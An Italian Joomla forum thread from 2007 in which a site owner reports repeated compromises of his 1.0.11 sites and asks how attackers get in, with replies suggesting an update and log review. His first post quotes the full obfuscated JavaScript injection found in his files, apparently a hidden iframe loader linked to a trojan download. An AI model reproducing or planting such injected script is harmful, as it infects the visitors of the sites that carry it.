Joomla.it Forum

Joomla! 1.0.x (versione con supporto terminato) => Le voci di Joomla.it (solo per versione Joomla 1.0.x) => : calboni 14 Jun 2007, 16:09:48

: Mi stanno scassando gli Joomla !
: calboni 14 Jun 2007, 16:09:48

Ho alcuni siti con Joomla senza componenti soggetti ad attenzione.

Mi ritrovo quasi sempre questo script nell'index2 e altrove:

document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61%73%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20%65%6e%63%6f%64%65%28%73%74%72%29%7b%76%61%72%20%65%6e%64%3d%75%6e%65%73%63%61%70%65%28%73%74%72%2e%73%75%62%73%74%72%28%30%2c%20%73%74%72%2e%6c%65%6e%67%74%68%2d%31%29%29%3b%76%61%72%20%6e%6f%77%3d%27%27%3b%66%6f%72%28%69%3d%30%3b%20%69%3c%65%6e%64%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%6e%6f%77%2b%3d%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%65%6e%64%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%2d%20%73%74%72%2e%73%75%62%73%74%72%28%73%74%72%2e%6c%65%6e%67%74%68%2d%31%2c%31%29%29%3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%75%6e%65%73%63%61%70%65%28%6e%6f%77%29%29%3b%7d%3c%2f%73%63%72%69%70%74%3e'));encode('%297Gmjveqi%2964wvg%297H%296%3Blxxt%297E33gvyrix2mrjs3syx2tlt%296%3B%2964%7Bmhxl%297H%296%3B5%296%3B%2964limklx%297H%296%3B5%296%3B%2964wx%7Dpi%297H%296%3Bzmwmfmpmx%7D%297E%2964lmhhir%297F%296%3B%297I%297G3mjveqi%297I4')

La versione di Joomla è 1.0.11 e l'unico componente extra è Joom!Fish Version 1.7

Ho il file php.ini in tutte le cartelle con:
register_globals = Off
allow_url_fopen = Off

Proprio oggi aprendone uno mi ha dato un errore l'antivirus dicendo che stava scaricando un trojan.

Ma da dove si intruffolano?

P.S.
Mi scordavo di aggiungere che i siti smanipolati alla fine puntano sempre a http:///

: Re: Mi stanno scassando gli Joomla !
: carlodamo 15 Jun 2007, 08:30:35

nel mio piccolo, so che converrebbe sempre aggiornare joomla alla versione piu recente, adesso siamo alla 12.. ciao

: Re: Mi stanno scassando gli Joomla !
: surfbit 15 Jun 2007, 11:01:34

Anche se è un cosa un pò laboriosa da consultare fatti dare i file di log. Il più delle volte si capisce il problema.

: Re: Mi stanno scassando gli Joomla !
: calboni 16 Jun 2007, 00:53:53

: surfbit  15 Jun 2007, 11:01:34

Anche se è un cosa un pò laboriosa da consultare fatti dare i file di log. Il più delle volte si capisce il problema.

Blurp!
Ho l'hosting su aruba e mi risulta un po' difficile accedere a dei log completi.

Vorrà dire che aggiornerò tutti i siti (aaaaaargh!) alla 1.0.12.
E che Dio ce la mandi buona (e bionda).

Corrado

: Re: Mi stanno scassando gli Joomla !
: joomlapixel 17 Jun 2007, 03:16:13

Meglio le brune..........
Sara docet
 ;D